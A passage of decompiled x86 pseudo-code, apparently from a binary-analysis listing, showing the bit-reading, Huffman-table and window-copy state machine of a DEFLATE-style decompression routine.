                                                          						__eax =  *(__ebp - 0x40);
                                                          						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                          						__ecx = __eax;
                                                          						__esi[1] = __eax;
                                                          						__ecx = __eax & 0x0000001f;
                                                          						if(__cl > 0x1d) {
                                                          							L9:
                                                          							_t443 = _t442 | 0xffffffff;
                                                          							 *_t446 = 0x11;
                                                          							L10:
                                                          							_t446[0x147] =  *(_t448 - 0x40);
                                                          							_t446[0x146] = _t425;
                                                          							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                          							L11:
                                                          							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                          							_t446[0x26ea] =  *(_t448 - 0x30);
                                                          							E004070B4( *(_t448 + 8));
                                                          							return _t443;
                                                          						}
                                                          						L58:
                                                          						__eax = __eax & 0x000003e0;
                                                          						if(__eax > 0x3a0) {
                                                          							goto L9;
                                                          						}
                                                          						L59:
                                                          						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                          						__ebx = __ebx - 0xe;
                                                          						_t94 =  &(__esi[2]);
                                                          						 *_t94 = __esi[2] & 0x00000000;
                                                          						 *__esi = 0xc;
                                                          						while(1) {
                                                          							L60:
                                                          							__esi[1] = __esi[1] >> 0xa;
                                                          							__eax = (__esi[1] >> 0xa) + 4;
                                                          							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                          								goto L68;
                                                          							}
                                                          							L61:
                                                          							while(1) {
                                                          								L64:
                                                          								if(__ebx >= 3) {
                                                          									break;
                                                          								}
                                                          								L62:
                                                          								if( *(__ebp - 0x34) == 0) {
                                                          									goto L182;
                                                          								}
                                                          								L63:
                                                          								__eax =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          								__ecx = __ebx;
                                                          								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          								__ebx = __ebx + 8;
                                                          							}
                                                          							L65:
                                                          							__ecx = __esi[2];
                                                          							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                          							__ebx = __ebx - 3;
                                                          							_t108 = __ecx + 0x408408; // 0x121110
                                                          							__ecx =  *_t108;
                                                          							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                          							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                          							__ecx = __esi[1];
                                                          							__esi[2] = __esi[2] + 1;
                                                          							__eax = __esi[2];
                                                          							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                          							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                          								goto L64;
                                                          							}
                                                          							L66:
                                                          							while(1) {
                                                          								L68:
                                                          								if(__esi[2] >= 0x13) {
                                                          									break;
                                                          								}
                                                          								L67:
                                                          								_t119 = __esi[2] + 0x408408; // 0x4000300
                                                          								__eax =  *_t119;
                                                          								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                          								_t126 =  &(__esi[2]);
                                                          								 *_t126 = __esi[2] + 1;
                                                          							}
                                                          							L69:
                                                          							__ecx = __ebp - 8;
                                                          							__edi =  &(__esi[0x143]);
                                                          							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                          							__eax = 0;
                                                          							 *(__ebp - 8) = 0;
                                                          							__eax =  &(__esi[3]);
                                                          							 *__edi = 7;
                                                          							__eax = E0040711C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                          							if(__eax != 0) {
                                                          								L72:
                                                          								 *__esi = 0x11;
                                                          								while(1) {
                                                          									L180:
                                                          									_t396 =  *_t446;
                                                          									if(_t396 > 0xf) {
                                                          										break;
                                                          									}
                                                          									L1:
                                                          									switch( *((intOrPtr*)(_t396 * 4 +  &M00407074))) {
                                                          										case 0:
                                                          											L101:
                                                          											__eax = __esi[4] & 0x000000ff;
                                                          											__esi[3] = __esi[4] & 0x000000ff;
                                                          											__eax = __esi[5];
                                                          											__esi[2] = __esi[5];
                                                          											 *__esi = 1;
                                                          											goto L102;
                                                          										case 1:
                                                          											L102:
                                                          											__eax = __esi[3];
                                                          											while(1) {
                                                          												L105:
                                                          												__eflags = __ebx - __eax;
                                                          												if(__ebx >= __eax) {
                                                          													break;
                                                          												}
                                                          												L103:
                                                          												__eflags =  *(__ebp - 0x34);
                                                          												if( *(__ebp - 0x34) == 0) {
                                                          													goto L182;
                                                          												}
                                                          												L104:
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          												__ecx = __ebx;
                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          												__ebx = __ebx + 8;
                                                          												__eflags = __ebx;
                                                          											}
                                                          											L106:
                                                          											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                          											__eax = __eax &  *(__ebp - 0x40);
                                                          											__ecx = __esi[2];
                                                          											__eax = __esi[2] + __eax * 4;
                                                          											__ecx =  *(__eax + 1) & 0x000000ff;
                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                          											__ecx =  *__eax & 0x000000ff;
                                                          											__eflags = __ecx;
                                                          											if(__ecx != 0) {
                                                          												L108:
                                                          												__eflags = __cl & 0x00000010;
                                                          												if((__cl & 0x00000010) == 0) {
                                                          													L110:
                                                          													__eflags = __cl & 0x00000040;
                                                          													if((__cl & 0x00000040) == 0) {
                                                          														goto L125;
                                                          													}
                                                          													L111:
                                                          													__eflags = __cl & 0x00000020;
                                                          													if((__cl & 0x00000020) == 0) {
                                                          														goto L9;
                                                          													}
                                                          													L112:
                                                          													 *__esi = 7;
                                                          													goto L180;
                                                          												}
                                                          												L109:
                                                          												__esi[2] = __ecx;
                                                          												__esi[1] = __eax;
                                                          												 *__esi = 2;
                                                          												goto L180;
                                                          											}
                                                          											L107:
                                                          											__esi[2] = __eax;
                                                          											 *__esi = 6;
                                                          											goto L180;
                                                          										case 2:
                                                          											L113:
                                                          											__eax = __esi[2];
                                                          											while(1) {
                                                          												L116:
                                                          												__eflags = __ebx - __eax;
                                                          												if(__ebx >= __eax) {
                                                          													break;
                                                          												}
                                                          												L114:
                                                          												__eflags =  *(__ebp - 0x34);
                                                          												if( *(__ebp - 0x34) == 0) {
                                                          													goto L182;
                                                          												}
                                                          												L115:
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          												__ecx = __ebx;
                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          												__ebx = __ebx + 8;
                                                          												__eflags = __ebx;
                                                          											}
                                                          											L117:
                                                          											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                          											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                          											__ecx = __eax;
                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          											__ebx = __ebx - __eax;
                                                          											__eflags = __ebx;
                                                          											__eax = __esi[4] & 0x000000ff;
                                                          											__esi[3] = __esi[4] & 0x000000ff;
                                                          											__eax = __esi[6];
                                                          											__esi[2] = __esi[6];
                                                          											 *__esi = 3;
                                                          											goto L118;
                                                          										case 3:
                                                          											L118:
                                                          											__eax = __esi[3];
                                                          											while(1) {
                                                          												L121:
                                                          												__eflags = __ebx - __eax;
                                                          												if(__ebx >= __eax) {
                                                          													break;
                                                          												}
                                                          												L119:
                                                          												__eflags =  *(__ebp - 0x34);
                                                          												if( *(__ebp - 0x34) == 0) {
                                                          													goto L182;
                                                          												}
                                                          												L120:
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          												__ecx = __ebx;
                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          												__ebx = __ebx + 8;
                                                          												__eflags = __ebx;
                                                          											}
                                                          											L122:
                                                          											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                          											__eax = __eax &  *(__ebp - 0x40);
                                                          											__ecx = __esi[2];
                                                          											__eax = __esi[2] + __eax * 4;
                                                          											__ecx =  *(__eax + 1) & 0x000000ff;
                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                          											__ecx =  *__eax & 0x000000ff;
                                                          											__eflags = __cl & 0x00000010;
                                                          											if((__cl & 0x00000010) == 0) {
                                                          												L124:
                                                          												__eflags = __cl & 0x00000040;
                                                          												if((__cl & 0x00000040) != 0) {
                                                          													goto L9;
                                                          												}
                                                          												L125:
                                                          												__esi[3] = __ecx;
                                                          												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                          												__esi[2] = __eax;
                                                          												goto L180;
                                                          											}
                                                          											L123:
                                                          											__esi[2] = __ecx;
                                                          											__esi[3] = __eax;
                                                          											 *__esi = 4;
                                                          											goto L180;
                                                          										case 4:
                                                          											L126:
                                                          											__eax = __esi[2];
                                                          											while(1) {
                                                          												L129:
                                                          												__eflags = __ebx - __eax;
                                                          												if(__ebx >= __eax) {
                                                          													break;
                                                          												}
                                                          												L127:
                                                          												__eflags =  *(__ebp - 0x34);
                                                          												if( *(__ebp - 0x34) == 0) {
                                                          													goto L182;
                                                          												}
                                                          												L128:
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          												__ecx = __ebx;
                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          												__ebx = __ebx + 8;
                                                          												__eflags = __ebx;
                                                          											}
                                                          											L130:
                                                          											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                          											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                          											__ecx = __eax;
                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          											__ebx = __ebx - __eax;
                                                          											__eflags = __ebx;
                                                          											 *__esi = 5;
                                                          											goto L131;
                                                          										case 5:
                                                          											L131:
                                                          											__eax =  *(__ebp - 0x30);
                                                          											__edx = __esi[3];
                                                          											__eax = __eax - __esi;
                                                          											__ecx = __eax - __esi - 0x1ba0;
                                                          											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                          											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                          												__ecx = __eax;
                                                          												__ecx = __eax - __edx;
                                                          												__eflags = __ecx;
                                                          											} else {
                                                          												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                          												__ecx = __esi[0x26e8] - __edx - __esi;
                                                          												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                          											}
                                                          											__eflags = __esi[1];
                                                          											 *(__ebp - 0x20) = __ecx;
                                                          											if(__esi[1] != 0) {
                                                          												L135:
                                                          												__edi =  *(__ebp - 0x2c);
                                                          												do {
                                                          													L136:
                                                          													__eflags = __edi;
                                                          													if(__edi != 0) {
                                                          														goto L152;
                                                          													}
                                                          													L137:
                                                          													__edi = __esi[0x26e8];
                                                          													__eflags = __eax - __edi;
                                                          													if(__eax != __edi) {
                                                          														L143:
                                                          														__esi[0x26ea] = __eax;
                                                          														__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                          														__eax = __esi[0x26ea];
                                                          														__ecx = __esi[0x26e9];
                                                          														__eflags = __eax - __ecx;
                                                          														 *(__ebp - 0x30) = __eax;
                                                          														if(__eax >= __ecx) {
                                                          															__edi = __esi[0x26e8];
                                                          															__edi = __esi[0x26e8] - __eax;
                                                          															__eflags = __edi;
                                                          														} else {
                                                          															__ecx = __ecx - __eax;
                                                          															__edi = __ecx - __eax - 1;
                                                          														}
                                                          														__edx = __esi[0x26e8];
                                                          														__eflags = __eax - __edx;
                                                          														 *(__ebp - 8) = __edx;
                                                          														if(__eax == __edx) {
                                                          															__edx =  &(__esi[0x6e8]);
                                                          															__eflags = __ecx - __edx;
                                                          															if(__ecx != __edx) {
                                                          																__eax = __edx;
                                                          																__eflags = __eax - __ecx;
                                                          																 *(__ebp - 0x30) = __eax;
                                                          																if(__eax >= __ecx) {
                                                          																	__edi =  *(__ebp - 8);
                                                          																	__edi =  *(__ebp - 8) - __eax;
                                                          																	__eflags = __edi;
                                                          																} else {
                                                          																	__ecx = __ecx - __eax;
                                                          																	__edi = __ecx;
                                                          																}
                                                          															}
                                                          														}
                                                          														__eflags = __edi;
                                                          														if(__edi == 0) {
                                                          															goto L183;
                                                          														} else {
                                                          															goto L152;
                                                          														}
                                                          													}
                                                          													L138:
                                                          													__ecx = __esi[0x26e9];
                                                          													__edx =  &(__esi[0x6e8]);
                                                          													__eflags = __ecx - __edx;
                                                          													if(__ecx == __edx) {
                                                          														goto L143;
                                                          													}
                                                          													L139:
                                                          													__eax = __edx;
                                                          													__eflags = __eax - __ecx;
                                                          													if(__eax >= __ecx) {
                                                          														__edi = __edi - __eax;
                                                          														__eflags = __edi;
                                                          													} else {
                                                          														__ecx = __ecx - __eax;
                                                          														__edi = __ecx;
                                                          													}
                                                          													__eflags = __edi;
                                                          													if(__edi == 0) {
                                                          														goto L143;
                                                          													}
                                                          													L152:
                                                          													__ecx =  *(__ebp - 0x20);
                                                          													 *__eax =  *__ecx;
                                                          													__eax = __eax + 1;
                                                          													__ecx = __ecx + 1;
                                                          													__edi = __edi - 1;
                                                          													__eflags = __ecx - __esi[0x26e8];
                                                          													 *(__ebp - 0x30) = __eax;
                                                          													 *(__ebp - 0x20) = __ecx;
                                                          													 *(__ebp - 0x2c) = __edi;
                                                          													if(__ecx == __esi[0x26e8]) {
                                                          														__ecx =  &(__esi[0x6e8]);
                                                          														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                          													}
                                                          													_t357 =  &(__esi[1]);
                                                          													 *_t357 = __esi[1] - 1;
                                                          													__eflags =  *_t357;
                                                          												} while ( *_t357 != 0);
                                                          											}
                                                          											goto L23;
                                                          										case 6:
                                                          											L156:
                                                          											__eax =  *(__ebp - 0x2c);
                                                          											__edi =  *(__ebp - 0x30);
                                                          											__eflags = __eax;
                                                          											if(__eax != 0) {
                                                          												L172:
                                                          												__cl = __esi[2];
                                                          												 *__edi = __cl;
                                                          												__edi = __edi + 1;
                                                          												__eax = __eax - 1;
                                                          												 *(__ebp - 0x30) = __edi;
                                                          												 *(__ebp - 0x2c) = __eax;
                                                          												goto L23;
                                                          											}
                                                          											L157:
                                                          											__ecx = __esi[0x26e8];
                                                          											__eflags = __edi - __ecx;
                                                          											if(__edi != __ecx) {
                                                          												L163:
                                                          												__esi[0x26ea] = __edi;
                                                          												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                          												__edi = __esi[0x26ea];
                                                          												__ecx = __esi[0x26e9];
                                                          												__eflags = __edi - __ecx;
                                                          												 *(__ebp - 0x30) = __edi;
                                                          												if(__edi >= __ecx) {
                                                          													__eax = __esi[0x26e8];
                                                          													__eax = __esi[0x26e8] - __edi;
                                                          													__eflags = __eax;
                                                          												} else {
                                                          													__ecx = __ecx - __edi;
                                                          													__eax = __ecx - __edi - 1;
                                                          												}
                                                          												__edx = __esi[0x26e8];
                                                          												__eflags = __edi - __edx;
                                                          												 *(__ebp - 8) = __edx;
                                                          												if(__edi == __edx) {
                                                          													__edx =  &(__esi[0x6e8]);
                                                          													__eflags = __ecx - __edx;
                                                          													if(__ecx != __edx) {
                                                          														__edi = __edx;
                                                          														__eflags = __edi - __ecx;
                                                          														 *(__ebp - 0x30) = __edi;
                                                          														if(__edi >= __ecx) {
                                                          															__eax =  *(__ebp - 8);
                                                          															__eax =  *(__ebp - 8) - __edi;
                                                          															__eflags = __eax;
                                                          														} else {
                                                          															__ecx = __ecx - __edi;
                                                          															__eax = __ecx;
                                                          														}
                                                          													}
                                                          												}
                                                          												__eflags = __eax;
                                                          												if(__eax == 0) {
                                                          													goto L183;
                                                          												} else {
                                                          													goto L172;
                                                          												}
                                                          											}
                                                          											L158:
                                                          											__eax = __esi[0x26e9];
                                                          											__edx =  &(__esi[0x6e8]);
                                                          											__eflags = __eax - __edx;
                                                          											if(__eax == __edx) {
                                                          												goto L163;
                                                          											}
                                                          											L159:
                                                          											__edi = __edx;
                                                          											__eflags = __edi - __eax;
                                                          											if(__edi >= __eax) {
                                                          												__ecx = __ecx - __edi;
                                                          												__eflags = __ecx;
                                                          												__eax = __ecx;
                                                          											} else {
                                                          												__eax = __eax - __edi;
                                                          												__eax = __eax - 1;
                                                          											}
                                                          											__eflags = __eax;
                                                          											if(__eax != 0) {
                                                          												goto L172;
                                                          											} else {
                                                          												goto L163;
                                                          											}
                                                          										case 7:
                                                          											L173:
                                                          											__eflags = __ebx - 7;
                                                          											if(__ebx > 7) {
                                                          												__ebx = __ebx - 8;
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                          												_t380 = __ebp - 0x38;
                                                          												 *_t380 =  *(__ebp - 0x38) - 1;
                                                          												__eflags =  *_t380;
                                                          											}
                                                          											goto L175;
                                                          										case 8:
                                                          											L4:
                                                          											while(_t425 < 3) {
                                                          												if( *(_t448 - 0x34) == 0) {
                                                          													goto L182;
                                                          												} else {
                                                          													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                          													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                          													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                          													_t425 = _t425 + 8;
                                                          													continue;
                                                          												}
                                                          											}
                                                          											_t425 = _t425 - 3;
                                                          											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                          											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                          											asm("sbb ecx, ecx");
                                                          											_t408 = _t406 >> 1;
                                                          											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                          											if(_t408 == 0) {
                                                          												L24:
                                                          												 *_t446 = 9;
                                                          												_t436 = _t425 & 0x00000007;
                                                          												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                          												_t425 = _t425 - _t436;
                                                          												goto L180;
                                                          											}
                                                          											L6:
                                                          											_t411 = _t408 - 1;
                                                          											if(_t411 == 0) {
                                                          												L13:
                                                          												__eflags =  *0x42e3a8;
                                                          												if( *0x42e3a8 != 0) {
                                                          													L22:
                                                          													_t412 =  *0x40a42c; // 0x9
                                                          													_t446[4] = _t412;
                                                          													_t413 =  *0x40a430; // 0x5
                                                          													_t446[4] = _t413;
                                                          													_t414 =  *0x42d224; // 0x42db28
                                                          													_t446[5] = _t414;
                                                          													_t415 =  *0x42d220; // 0x42e328
                                                          													_t446[6] = _t415;
                                                          													L23:
                                                          													 *_t446 =  *_t446 & 0x00000000;
                                                          													goto L180;
                                                          												} else {
                                                          													_t26 = _t448 - 8;
                                                          													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                          													__eflags =  *_t26;
                                                          													_t416 = 0x42d228;
                                                          													goto L15;
                                                          													L20:
                                                          													 *_t416 = _t438;
                                                          													_t416 = _t416 + 4;
                                                          													__eflags = _t416 - 0x42d6a8;
                                                          													if(_t416 < 0x42d6a8) {
                                                          														L15:
                                                          														__eflags = _t416 - 0x42d464;
                                                          														_t438 = 8;
                                                          														if(_t416 > 0x42d464) {
                                                          															__eflags = _t416 - 0x42d628;
                                                          															if(_t416 >= 0x42d628) {
                                                          																__eflags = _t416 - 0x42d688;
                                                          																if(_t416 < 0x42d688) {
                                                          																	_t438 = 7;
                                                          																}
                                                          															} else {
                                                          																_t438 = 9;
                                                          															}
                                                          														}
                                                          														goto L20;
                                                          													} else {
                                                          														E0040711C(0x42d228, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d224, 0x40a42c, 0x42db28, _t448 - 8);
                                                          														_push(0x1e);
                                                          														_pop(_t440);
                                                          														_push(5);
                                                          														_pop(_t419);
                                                          														memset(0x42d228, _t419, _t440 << 2);
                                                          														_t450 = _t450 + 0xc;
                                                          														_t442 = 0x42d228 + _t440;
                                                          														E0040711C(0x42d228, 0x1e, 0, 0x40849c, 0x4084d8, "(�B", 0x40a430, 0x42db28, _t448 - 8);
                                                          														 *0x42e3a8 =  *0x42e3a8 + 1;
                                                          														__eflags =  *0x42e3a8;
                                                          														goto L22;
                                                          													}
                                                          												}
                                                          											}
                                                          											L7:
                                                          											_t423 = _t411 - 1;
                                                          											if(_t423 == 0) {
                                                          												 *_t446 = 0xb;
                                                          												goto L180;
                                                          											}
                                                          											L8:
                                                          											if(_t423 != 1) {
                                                          												goto L180;
                                                          											}
                                                          											goto L9;
                                                          										case 9:
                                                          											while(1) {
                                                          												L27:
                                                          												__eflags = __ebx - 0x20;
                                                          												if(__ebx >= 0x20) {
                                                          													break;
                                                          												}
                                                          												L25:
                                                          												__eflags =  *(__ebp - 0x34);
                                                          												if( *(__ebp - 0x34) == 0) {
                                                          													goto L182;
                                                          												}
                                                          												L26:
                                                          												__eax =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          												__ecx = __ebx;
                                                          												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          												__ebx = __ebx + 8;
                                                          												__eflags = __ebx;
                                                          											}
                                                          											L28:
                                                          											__eax =  *(__ebp - 0x40);
                                                          											__ebx = 0;
                                                          											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                          											 *(__ebp - 0x40) = 0;
                                                          											__eflags = __eax;
                                                          											__esi[1] = __eax;
                                                          											if(__eax == 0) {
                                                          												goto L53;
                                                          											}
                                                          											L29:
                                                          											_push(0xa);
                                                          											_pop(__eax);
                                                          											goto L54;
                                                          										case 0xa:
                                                          											L30:
                                                          											__eflags =  *(__ebp - 0x34);
                                                          											if( *(__ebp - 0x34) == 0) {
                                                          												goto L182;
                                                          											}
                                                          											L31:
                                                          											__eax =  *(__ebp - 0x2c);
                                                          											__eflags = __eax;
                                                          											if(__eax != 0) {
                                                          												L48:
                                                          												__eflags = __eax -  *(__ebp - 0x34);
                                                          												if(__eax >=  *(__ebp - 0x34)) {
                                                          													__eax =  *(__ebp - 0x34);
                                                          												}
                                                          												__ecx = __esi[1];
                                                          												__eflags = __ecx - __eax;
                                                          												__edi = __ecx;
                                                          												if(__ecx >= __eax) {
                                                          													__edi = __eax;
                                                          												}
                                                          												__eax = E00405C4B( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                          												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                          												_t80 =  &(__esi[1]);
                                                          												 *_t80 = __esi[1] - __edi;
                                                          												__eflags =  *_t80;
                                                          												if( *_t80 == 0) {
                                                          													L53:
                                                          													__eax = __esi[0x145];
                                                          													L54:
                                                          													 *__esi = __eax;
                                                          												}
                                                          												goto L180;
                                                          											}
                                                          											L32:
                                                          											__ecx = __esi[0x26e8];
                                                          											__edx =  *(__ebp - 0x30);
                                                          											__eflags = __edx - __ecx;
                                                          											if(__edx != __ecx) {
                                                          												L38:
                                                          												__esi[0x26ea] = __edx;
                                                          												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                          												__edx = __esi[0x26ea];
                                                          												__ecx = __esi[0x26e9];
                                                          												__eflags = __edx - __ecx;
                                                          												 *(__ebp - 0x30) = __edx;
                                                          												if(__edx >= __ecx) {
                                                          													__eax = __esi[0x26e8];
                                                          													__eax = __esi[0x26e8] - __edx;
                                                          													__eflags = __eax;
                                                          												} else {
                                                          													__ecx = __ecx - __edx;
                                                          													__eax = __ecx - __edx - 1;
                                                          												}
                                                          												__edi = __esi[0x26e8];
                                                          												 *(__ebp - 0x2c) = __eax;
                                                          												__eflags = __edx - __edi;
                                                          												if(__edx == __edi) {
                                                          													__edx =  &(__esi[0x6e8]);
                                                          													__eflags = __edx - __ecx;
                                                          													if(__eflags != 0) {
                                                          														 *(__ebp - 0x30) = __edx;
                                                          														if(__eflags >= 0) {
                                                          															__edi = __edi - __edx;
                                                          															__eflags = __edi;
                                                          															__eax = __edi;
                                                          														} else {
                                                          															__ecx = __ecx - __edx;
                                                          															__eax = __ecx;
                                                          														}
                                                          														 *(__ebp - 0x2c) = __eax;
                                                          													}
                                                          												}
                                                          												__eflags = __eax;
                                                          												if(__eax == 0) {
                                                          													goto L183;
                                                          												} else {
                                                          													goto L48;
                                                          												}
                                                          											}
                                                          											L33:
                                                          											__eax = __esi[0x26e9];
                                                          											__edi =  &(__esi[0x6e8]);
                                                          											__eflags = __eax - __edi;
                                                          											if(__eax == __edi) {
                                                          												goto L38;
                                                          											}
                                                          											L34:
                                                          											__edx = __edi;
                                                          											__eflags = __edx - __eax;
                                                          											 *(__ebp - 0x30) = __edx;
                                                          											if(__edx >= __eax) {
                                                          												__ecx = __ecx - __edx;
                                                          												__eflags = __ecx;
                                                          												__eax = __ecx;
                                                          											} else {
                                                          												__eax = __eax - __edx;
                                                          												__eax = __eax - 1;
                                                          											}
                                                          											__eflags = __eax;
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											if(__eax != 0) {
                                                          												goto L48;
                                                          											} else {
                                                          												goto L38;
                                                          											}
                                                          										case 0xb:
                                                          											goto L56;
                                                          										case 0xc:
                                                          											L60:
                                                          											__esi[1] = __esi[1] >> 0xa;
                                                          											__eax = (__esi[1] >> 0xa) + 4;
                                                          											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                          												goto L68;
                                                          											}
                                                          											goto L61;
                                                          										case 0xd:
                                                          											while(1) {
                                                          												L93:
                                                          												__eax = __esi[1];
                                                          												__ecx = __esi[2];
                                                          												__edx = __eax;
                                                          												__eax = __eax & 0x0000001f;
                                                          												__edx = __edx >> 5;
                                                          												__eax = __edx + __eax + 0x102;
                                                          												__eflags = __esi[2] - __eax;
                                                          												if(__esi[2] >= __eax) {
                                                          													break;
                                                          												}
                                                          												L73:
                                                          												__eax = __esi[0x143];
                                                          												while(1) {
                                                          													L76:
                                                          													__eflags = __ebx - __eax;
                                                          													if(__ebx >= __eax) {
                                                          														break;
                                                          													}
                                                          													L74:
                                                          													__eflags =  *(__ebp - 0x34);
                                                          													if( *(__ebp - 0x34) == 0) {
                                                          														goto L182;
                                                          													}
                                                          													L75:
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          													__ecx = __ebx;
                                                          													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          													__ebx = __ebx + 8;
                                                          													__eflags = __ebx;
                                                          												}
                                                          												L77:
                                                          												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                          												__eax = __eax &  *(__ebp - 0x40);
                                                          												__ecx = __esi[0x144];
                                                          												__eax = __esi[0x144] + __eax * 4;
                                                          												__edx =  *(__eax + 1) & 0x000000ff;
                                                          												__eax =  *(__eax + 2) & 0x0000ffff;
                                                          												__eflags = __eax - 0x10;
                                                          												 *(__ebp - 0x14) = __eax;
                                                          												if(__eax >= 0x10) {
                                                          													L79:
                                                          													__eflags = __eax - 0x12;
                                                          													if(__eax != 0x12) {
                                                          														__eax = __eax + 0xfffffff2;
